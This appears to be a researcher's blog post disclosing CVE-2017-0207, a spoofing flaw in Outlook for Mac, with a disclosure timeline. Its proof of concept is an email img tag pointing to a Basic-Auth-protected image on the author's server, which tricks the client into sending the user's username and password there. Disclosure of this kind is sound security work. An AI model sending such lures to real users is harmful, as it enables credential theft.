After I found a vulnerability on Outlook365 product, I started to check other Outlook platforms as well. Long story short, I found an input validation vulnerability on Outlook for Mac product.

Proof of Concept

I created a Basic-Authentication protected folder on my website and put an image file on it.

I included this image with <img> tag inside the e-mail and sent that to Outlook for Mac client.

<p><img src= 3D"http://utkusen.com/mstest/test.jpg" alt= 3D"" ></p>

Result on Outlook for Mac's side:

A login prompt pops up. It says "Your login information will be sent securely" on the prompt but I can see the username/password values on my website's log.

Reference: Microsoft Outlook for Mac CVE-2017-0207 Spoofing Vulnerability

Fix Timeline

-Vulnerability is reported / 19 December 2016

-Microsoft said they got the report / 22 December 2016

-Microsoft said they reproduced the issue / 4 January 2017

-Microsoft said they will fix the vulnerability on March 14 / 22 February 2017

-Microsoft said I entered into March's acknowledgement list / 7 March 2017

-Microsoft published acknowledgement for this: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0207

-Microsoft published March's acknowledgement list (my name wasn't there) / Second week of April

-I told Microsoft that my name is missing / 17 April 2017

-I told Microsoft that my name is missing / 19 April 2017

-I told Microsoft that my name is missing / 21 April 2017